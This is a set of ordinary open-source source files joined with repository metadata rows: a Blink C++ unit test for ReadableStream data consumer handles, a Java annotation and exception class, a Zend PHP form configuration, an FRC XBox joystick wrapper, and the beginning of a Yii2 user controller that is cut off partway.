    // records a gtest failure) if compilation fails.
    v8::MaybeLocal<v8::Value> eval(const char* s)
    {
        v8::Local<v8::String> source;
        v8::Local<v8::Script> script;
        V8RecursionScope::MicrotaskSuppression microtasks(isolate());
        if (!v8Call(v8::String::NewFromUtf8(isolate(), s, v8::NewStringType::kNormal), source)) {
            ADD_FAILURE();
            return v8::MaybeLocal<v8::Value>();
        }
        if (!v8Call(v8::Script::Compile(getScriptState()->context(), source), script)) {
            ADD_FAILURE() << "Compilation fails";
            return v8::MaybeLocal<v8::Value>();
        }
        return script->Run(getScriptState()->context());
    }

    // Same as eval(), but surfaces any thrown exception as a gtest failure
    // message before re-throwing it into V8.
    v8::MaybeLocal<v8::Value> evalWithPrintingError(const char* s)
    {
        v8::TryCatch block(isolate());
        v8::MaybeLocal<v8::Value> r = eval(s);
        if (block.HasCaught()) {
            ADD_FAILURE() << toCoreString(block.Exception()->ToString(isolate())).utf8().data();
            block.ReThrow();
        }
        return r;
    }

    // Acquires a reader from |stream| and wraps it in the handle under test.
    PassOwnPtr<ReadableStreamDataConsumerHandle> createHandle(ScriptValue stream)
    {
        NonThrowableExceptionState es;
        ScriptValue reader = ReadableStreamOperations::getReader(getScriptState(), stream, es);
        ASSERT(!reader.isEmpty());
        ASSERT(reader.v8Value()->IsObject());
        return ReadableStreamDataConsumerHandle::create(getScriptState(), reader);
    }

    void gc() { V8GCController::collectAllGarbageForTesting(isolate()); }

private:
    OwnPtr<DummyPageHolder> m_page;
};
// Obtaining a reader must asynchronously notify the client exactly once.
TEST_F(ReadableStreamDataConsumerHandleTest, Create)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError("new ReadableStream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));

    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
}
// A stream closed with no chunks: the first read reports ShouldWait (the
// close has not been observed yet), and once pending tasks run, Done.
TEST_F(ReadableStreamDataConsumerHandleTest, EmptyStream)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "new ReadableStream({start: c => c.close()})"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));

    char c;
    size_t readBytes;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->read(&c, 1, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kDone, reader->read(&c, 1, kNone, &readBytes));
}
// An errored stream: ShouldWait until the error propagates, then
// UnexpectedError from read().
TEST_F(ReadableStreamDataConsumerHandleTest, ErroredStream)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "new ReadableStream({start: c => c.error()})"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));

    char c;
    size_t readBytes;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->read(&c, 1, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kUnexpectedError, reader->read(&c, 1, kNone, &readBytes));
}
// Enqueued Uint8Array chunks are drained across multiple read() calls with a
// buffer smaller than the chunks; chunk boundaries are preserved (a read
// never spans two chunks) and the empty chunk yields no bytes.
TEST_F(ReadableStreamDataConsumerHandleTest, Read)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "var controller;"
        "var stream = new ReadableStream({start: c => controller = c});"
        "controller.enqueue(new Uint8Array());"
        "controller.enqueue(new Uint8Array([0x43, 0x44, 0x45, 0x46]));"
        "controller.enqueue(new Uint8Array([0x47, 0x48, 0x49, 0x4a]));"
        "controller.close();"
        "stream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(4));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(5));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(6));

    char buffer[3];
    size_t readBytes;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(4);
    EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
    EXPECT_EQ(3u, readBytes);
    EXPECT_EQ(0x43, buffer[0]);
    EXPECT_EQ(0x44, buffer[1]);
    EXPECT_EQ(0x45, buffer[2]);
    EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
    EXPECT_EQ(1u, readBytes);
    EXPECT_EQ(0x46, buffer[0]);
    EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(5);
    EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
    EXPECT_EQ(3u, readBytes);
    EXPECT_EQ(0x47, buffer[0]);
    EXPECT_EQ(0x48, buffer[1]);
    EXPECT_EQ(0x49, buffer[2]);
    EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
    EXPECT_EQ(1u, readBytes);
    EXPECT_EQ(0x4a, buffer[0]);
    EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
    testing::runPendingTasks();
    checkpoint.Call(6);
    EXPECT_EQ(kDone, reader->read(buffer, 3, kNone, &readBytes));
}
// Same chunk sequence via the two-phase beginRead/endRead interface:
// endRead(0) leaves the chunk untouched, partial endRead advances within the
// chunk, and a full consume moves to the next chunk.
TEST_F(ReadableStreamDataConsumerHandleTest, TwoPhaseRead)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "var controller;"
        "var stream = new ReadableStream({start: c => controller = c});"
        "controller.enqueue(new Uint8Array());"
        "controller.enqueue(new Uint8Array([0x43, 0x44, 0x45, 0x46]));"
        "controller.enqueue(new Uint8Array([0x47, 0x48, 0x49, 0x4a]));"
        "controller.close();"
        "stream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(4));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(5));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(6));

    const void* buffer;
    size_t available;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(4);
    EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
    EXPECT_EQ(4u, available);
    EXPECT_EQ(0x43, static_cast<const char*>(buffer)[0]);
    EXPECT_EQ(0x44, static_cast<const char*>(buffer)[1]);
    EXPECT_EQ(0x45, static_cast<const char*>(buffer)[2]);
    EXPECT_EQ(0x46, static_cast<const char*>(buffer)[3]);
    EXPECT_EQ(kOk, reader->endRead(0));
    EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
    EXPECT_EQ(4u, available);
    EXPECT_EQ(0x43, static_cast<const char*>(buffer)[0]);
    EXPECT_EQ(0x44, static_cast<const char*>(buffer)[1]);
    EXPECT_EQ(0x45, static_cast<const char*>(buffer)[2]);
    EXPECT_EQ(0x46, static_cast<const char*>(buffer)[3]);
    EXPECT_EQ(kOk, reader->endRead(1));
    EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
    EXPECT_EQ(3u, available);
    EXPECT_EQ(0x44, static_cast<const char*>(buffer)[0]);
    EXPECT_EQ(0x45, static_cast<const char*>(buffer)[1]);
    EXPECT_EQ(0x46, static_cast<const char*>(buffer)[2]);
    EXPECT_EQ(kOk, reader->endRead(3));
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(5);
    EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
    EXPECT_EQ(4u, available);
    EXPECT_EQ(0x47, static_cast<const char*>(buffer)[0]);
    EXPECT_EQ(0x48, static_cast<const char*>(buffer)[1]);
    EXPECT_EQ(0x49, static_cast<const char*>(buffer)[2]);
    EXPECT_EQ(0x4a, static_cast<const char*>(buffer)[3]);
    EXPECT_EQ(kOk, reader->endRead(4));
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(6);
    EXPECT_EQ(kDone, reader->beginRead(&buffer, kNone, &available));
}
// A non-Uint8Array chunk (undefined) must surface as UnexpectedError.
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueUndefined)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "var controller;"
        "var stream = new ReadableStream({start: c => controller = c});"
        "controller.enqueue(undefined);"
        "controller.close();"
        "stream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));

    const void* buffer;
    size_t available;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
// A non-Uint8Array chunk (null) must surface as UnexpectedError.
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueNull)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "var controller;"
        "var stream = new ReadableStream({start: c => controller = c});"
        "controller.enqueue(null);"
        "controller.close();"
        "stream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));

    const void* buffer;
    size_t available;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
// A non-Uint8Array chunk (a string) must surface as UnexpectedError.
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueString)
{
    ScriptState::Scope scope(getScriptState());
    ScriptValue stream(getScriptState(), evalWithPrintingError(
        "var controller;"
        "var stream = new ReadableStream({start: c => controller = c});"
        "controller.enqueue('hello');"
        "controller.close();"
        "stream"));
    ASSERT_FALSE(stream.isEmpty());
    OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
    ASSERT_TRUE(handle);
    MockClient* client = MockClient::create();
    Checkpoint checkpoint;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(3));

    const void* buffer;
    size_t available;
    OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
    ASSERT_TRUE(reader);
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(3);
    EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
// The handle must hold the stream reader only weakly: after the script-side
// stream is collected, reads fail with UnexpectedError instead of keeping the
// stream alive.
TEST_F(ReadableStreamDataConsumerHandleTest, StreamReaderShouldBeWeak)
{
    OwnPtr<FetchDataConsumerHandle::Reader> reader;
    Checkpoint checkpoint;
    Persistent<MockClient> client = MockClient::create();
    ScriptValue stream;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(checkpoint, Call(3));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(4));

    {
        // We need this scope to collect local handles.
        ScriptState::Scope scope(getScriptState());
        stream = ScriptValue(getScriptState(), evalWithPrintingError("new ReadableStream()"));
        ASSERT_FALSE(stream.isEmpty());
        OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
        ASSERT_TRUE(handle);

        reader = handle->obtainReader(client);
        ASSERT_TRUE(reader);
    }

    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    stream.clear();
    gc();
    checkpoint.Call(3);
    testing::runPendingTasks();
    checkpoint.Call(4);

    const void* buffer;
    size_t available;
    EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
// Same weakness requirement, but with a read already pending when the stream
// is garbage-collected.
TEST_F(ReadableStreamDataConsumerHandleTest, StreamReaderShouldBeWeakWhenReading)
{
    OwnPtr<FetchDataConsumerHandle::Reader> reader;
    Checkpoint checkpoint;
    Persistent<MockClient> client = MockClient::create();
    ScriptValue stream;

    InSequence s;
    EXPECT_CALL(checkpoint, Call(1));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(2));
    EXPECT_CALL(checkpoint, Call(3));
    EXPECT_CALL(checkpoint, Call(4));
    EXPECT_CALL(*client, didGetReadable());
    EXPECT_CALL(checkpoint, Call(5));

    {
        // We need this scope to collect local handles.
        ScriptState::Scope scope(getScriptState());
        stream = ScriptValue(getScriptState(), evalWithPrintingError("new ReadableStream()"));
        ASSERT_FALSE(stream.isEmpty());
        OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
        ASSERT_TRUE(handle);

        reader = handle->obtainReader(client);
        ASSERT_TRUE(reader);
    }

    const void* buffer;
    size_t available;
    checkpoint.Call(1);
    testing::runPendingTasks();
    checkpoint.Call(2);
    EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
    testing::runPendingTasks();
    checkpoint.Call(3);
    stream.clear();
    gc();
    checkpoint.Call(4);
    testing::runPendingTasks();
    checkpoint.Call(5);
    EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
} // namespace
} // namespace blink
| highweb-project/highweb-webcl-html5spec | third_party/WebKit/Source/modules/fetch/ReadableStreamDataConsumerHandleTest.cpp | C++ | bsd-3-clause | 19,032 |
//
// Scaled - a scalable editor extensible via JVM languages
// http://github.com/scaled/scaled/blob/master/LICENSE
package scaled;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
/**
* Defines a configuration var. Modes define configuration vars which can subsequently be
* customized by the user in a mode configuration file, or interactively.
*/
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
public @interface Var {
/** A documentary description of this configuration var. This will be shown to the user when
* they ask to describe the var, so don't hold back on the details. */
String value ();
}
| swhgoon/scaled | api/src/main/java/scaled/Var.java | Java | bsd-3-clause | 753 |
<?php
use Zend\View;
use \CodeEmailMKT\Infrastructure;
use CodeEmailMKT\Application\Form\{CustomerForm, LoginForm, TagForm};
use CodeEmailMKT\Application\Form\Factory\{CustomerFormFactory, LoginFormFactory, TagFormFactory};
// Service-manager wiring for the application's forms and view helpers.
$forms = [
    'dependencies' => [
        'aliases' => [
        ],
        'invokables' => [
        ],
        'factories' => [
            // HelperPluginManager is built by our own factory so custom view helpers get registered
            View\HelperPluginManager::class => Infrastructure\View\HelperPluginManagerFactory::class,
            LoginForm::class => LoginFormFactory::class,
            CustomerForm::class => CustomerFormFactory::class,
            TagForm::class => TagFormFactory::class
        ]
    ],
    'view_helpers' => [
        'aliases' => [
        ],
        'invokables' => [
        ],
        'factories' => [
            // 'identity' view helper exposes the authenticated user inside templates
            'identity' => View\Helper\Service\IdentityFactory::class
        ]
    ]
];
// Merge zend-form's default configuration with the application overrides above.
$configProviderForm = (new \Zend\Form\ConfigProvider())->__invoke();
return Zend\Stdlib\ArrayUtils::merge($configProviderForm, $forms);
// vim:filetype=java:ts=4
/*
Copyright (c) 2005, 2006, 2007
Conor McDermottroe. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the author nor the names of any contributors to
the software may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.mcdermottroe.exemplar.input;
import com.mcdermottroe.exemplar.Exception;
/** Thrown when anything goes wrong during the input phase of the program.

	@author Conor McDermottroe
	@since 0.1
*/
public class InputException
extends Exception
{
	/** Create an InputException with neither a description nor a cause. */
	public InputException() {
		super();
	}

	/** Create an InputException carrying a description.

		@param message The description of the exception.
	*/
	public InputException(String message) {
		super(message);
	}

	/** Create an InputException carrying a description and a reference to
		the exception which caused it.

		@param message The description of the exception.
		@param cause The cause of the exception.
	*/
	public InputException(String message, Throwable cause) {
		super(message, cause);
	}

	/** Create an InputException carrying only a reference to the exception
		that caused it.

		@param cause The cause of the exception.
	*/
	public InputException(Throwable cause) {
		super(cause);
	}

	/** {@inheritDoc} */
	public InputException getCopy() {
		String message = getMessage();
		Throwable cause = getCause();

		// Select the most specific constructor for the state we actually have.
		InputException copy;
		if (message == null) {
			copy = (cause == null) ?
				new InputException() :
				new InputException(cause);
		} else {
			copy = (cause == null) ?
				new InputException(message) :
				new InputException(message, cause);
		}
		copy.setStackTrace(copyStackTrace(getStackTrace()));
		return copy;
	}
}
| conormcd/exemplar | src/com/mcdermottroe/exemplar/input/InputException.java | Java | bsd-3-clause | 3,051 |
package sensor;
import core.Sensor;
import edu.wpi.first.wpilibj.Joystick;
import event.events.ButtonEvent;
import event.events.XboxJoystickEvent;
import event.listeners.ButtonListener;
import event.listeners.XboxJoystickListener;
import java.util.Enumeration;
import java.util.Vector;
/**
 * Wrapper class for an XBox controller.
 *
 * Periodically polls a wpilibj Joystick and republishes state changes as
 * ButtonEvent / XboxJoystickEvent notifications to the registered listeners.
 *
 * @author ajc
 */
public class GRTXBoxJoystick extends Sensor {

    /**
     * Keys of data
     */
    public static final int KEY_BUTTON_0 = 0;
    public static final int KEY_BUTTON_1 = 1;
    public static final int KEY_BUTTON_2 = 2;
    public static final int KEY_BUTTON_3 = 3;
    public static final int KEY_BUTTON_4 = 4;
    public static final int KEY_BUTTON_5 = 5;
    public static final int KEY_BUTTON_6 = 6;
    public static final int KEY_BUTTON_7 = 7;
    public static final int KEY_BUTTON_8 = 8;
    public static final int KEY_BUTTON_9 = 9;
    public static final int KEY_LEFT_X = 10;
    public static final int KEY_LEFT_Y = 11;
    public static final int KEY_RIGHT_X = 12;
    public static final int KEY_RIGHT_Y = 13;
    public static final int KEY_JOYSTICK_ANGLE = 14;
    public static final int KEY_TRIGGER = 15;
    public static final int KEY_PAD = 16;
    private static final int NUM_DATA = 17;
    // NOTE(review): button keys 0..9 are passed straight to
    // Joystick.getRawButton(); confirm against the WPILib docs whether button
    // numbering there starts at 0 or at 1 for this library version.
    private static final int NUM_OF_BUTTONS = 10;

    /**
     * State definitions
     */
    public static final double PRESSED = TRUE;
    public static final double RELEASED = FALSE;

    private final Joystick joystick;
    private final Vector buttonListeners;
    private final Vector joystickListeners;

    /**
     * Instantiates a new GRTXBoxJoystick.
     *
     * @param channel USB channel joystick is plugged into
     * @param pollTime how often to poll the joystick
     * @param name this joystick's name
     */
    public GRTXBoxJoystick(int channel, int pollTime, String name) {
        super(name, pollTime, NUM_DATA);
        joystick = new Joystick(channel);
        buttonListeners = new Vector();
        joystickListeners = new Vector();
    }

    /** Samples every button and axis, storing each reading in the state table. */
    protected void poll() {
        for (int key = 0; key < NUM_OF_BUTTONS; key++) {
            //a raw reading of true indicates the pressed state
            setState(key, joystick.getRawButton(key) ? PRESSED : RELEASED);
        }

        setState(KEY_LEFT_X, joystick.getX());
        setState(KEY_LEFT_Y, joystick.getY());
        setState(KEY_RIGHT_X, joystick.getRawAxis(4));
        setState(KEY_RIGHT_Y, joystick.getRawAxis(5));
        setState(KEY_JOYSTICK_ANGLE, joystick.getDirectionRadians());
        setState(KEY_TRIGGER, joystick.getZ());
        setState(KEY_PAD, joystick.getRawAxis(6));
    }

    /**
     * Routes a single datum change to the matching listener callback.
     *
     * @param id key of the datum that changed
     * @param newDatum the datum's new value
     */
    protected void notifyListeners(int id, double newDatum) {
        if (id < NUM_OF_BUTTONS) {
            //ID maps directly to button ID
            boolean pressed = newDatum == PRESSED;
            ButtonEvent e = new ButtonEvent(this, id, pressed);
            for (int i = 0; i < buttonListeners.size(); i++) {
                ButtonListener listener =
                        (ButtonListener) buttonListeners.elementAt(i);
                if (pressed)
                    listener.buttonPressed(e);
                else
                    listener.buttonReleased(e);
            }
        } else {
            //an axis, angle, trigger or pad datum
            XboxJoystickEvent e = new XboxJoystickEvent(this, id, newDatum);
            for (int i = 0; i < joystickListeners.size(); i++) {
                XboxJoystickListener listener =
                        (XboxJoystickListener) joystickListeners.elementAt(i);
                switch (id) {
                    case KEY_LEFT_X:
                        listener.leftXAxisMoved(e);
                        break;
                    case KEY_LEFT_Y:
                        listener.leftYAxisMoved(e);
                        break;
                    case KEY_RIGHT_X:
                        listener.rightXAxisMoved(e);
                        break;
                    case KEY_RIGHT_Y:
                        listener.rightYAxisMoved(e);
                        break;
                    case KEY_JOYSTICK_ANGLE:
                        listener.leftAngleChanged(e);
                        break;
                    case KEY_TRIGGER:
                        listener.triggerMoved(e);
                        break;
                    case KEY_PAD:
                        listener.padMoved(e);
                        break;
                }
            }
        }
    }

    public void addButtonListener(ButtonListener b) {
        buttonListeners.addElement(b);
    }

    public void removeButtonListener(ButtonListener b) {
        buttonListeners.removeElement(b);
    }

    public void addJoystickListener(XboxJoystickListener l) {
        joystickListeners.addElement(l);
    }

    public void removeJoystickListener(XboxJoystickListener l) {
        joystickListeners.removeElement(l);
    }
}
| grt192/grtframework | src/sensor/GRTXBoxJoystick.java | Java | bsd-3-clause | 6,230 |
<?php
namespace core\users\controllers\frontend;
use core\fileapi\actions\UploadAction as FileAPIUpload;
use core\users\models\frontend\Email;
use core\users\models\frontend\PasswordForm;
use core\users\models\Profile;
use core\users\Module;
use yii\filters\AccessControl;
use yii\web\Controller;
use yii\web\Response;
use yii\widgets\ActiveForm;
use Yii;
/**
 * Frontend controller for authenticated users.
 *
 * Handles logout, password/email changes, profile updates and OAuth callbacks.
 */
class UserController extends Controller
{
    /**
     * @inheritdoc
     *
     * Access control: every action here requires an authenticated user ('@').
     */
    public function behaviors()
    {
        return [
            'access' => [
                'class' => AccessControl::className(),
                'rules' => [
                    [
                        'allow' => true,
                        'roles' => ['@']
                    ]
                ]
            ]
        ];
    }

    /**
     * @inheritdoc
     *
     * NOTE(review): 'auth' wires successCallback to [$this, 'oAuthSuccess'],
     * but no oAuthSuccess() method is visible in this class or in
     * yii\web\Controller — presumably provided elsewhere (trait/behavior);
     * verify before relying on the OAuth flow.
     */
    public function actions()
    {
        return [
            'auth' => [
                'class' => 'yii\authclient\AuthAction',
                'successCallback' => [$this, 'oAuthSuccess'],
            ],
        ];
    }

    /**
     * Log Out page.
     *
     * Ends the current session and redirects to the home page.
     */
    public function actionLogout()
    {
        Yii::$app->user->logout();
        return $this->goHome();
    }

    /**
     * Change password page.
     *
     * On AJAX submit returns JSON validation errors; on success sets a flash
     * message and redirects home, otherwise flashes failure and re-renders.
     */
    public function actionPassword()
    {
        $model = new PasswordForm();
        if ($model->load(Yii::$app->request->post())) {
            if ($model->validate()) {
                // PasswordForm::password() performs the actual password change
                if ($model->password()) {
                    Yii::$app->session->setFlash(
                        'success',
                        Module::t('users', 'FRONTEND_FLASH_SUCCESS_PASSWORD_CHANGE')
                    );
                    return $this->goHome();
                } else {
                    Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_PASSWORD_CHANGE'));
                    return $this->refresh();
                }
            } elseif (Yii::$app->request->isAjax) {
                Yii::$app->response->format = Response::FORMAT_JSON;
                return ActiveForm::validate($model);
            }
        }
        return $this->render(
            'password',
            [
                'model' => $model
            ]
        );
    }

    /**
     * Request email change page.
     *
     * Validation happens explicitly first, so save(false) skips re-validating.
     */
    public function actionEmail()
    {
        $model = new Email();
        if ($model->load(Yii::$app->request->post())) {
            if ($model->validate()) {
                if ($model->save(false)) {
                    Yii::$app->session->setFlash('success', Module::t('users', 'FRONTEND_FLASH_SUCCES_EMAIL_CHANGE'));
                    return $this->goHome();
                } else {
                    Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_EMAIL_CHANGE'));
                    return $this->refresh();
                }
            } elseif (Yii::$app->request->isAjax) {
                Yii::$app->response->format = Response::FORMAT_JSON;
                return ActiveForm::validate($model);
            }
        }
        return $this->render(
            'email',
            [
                'model' => $model
            ]
        );
    }

    /**
     * Profile updating page.
     *
     * Loads the profile of the logged-in user, then validates/saves it.
     */
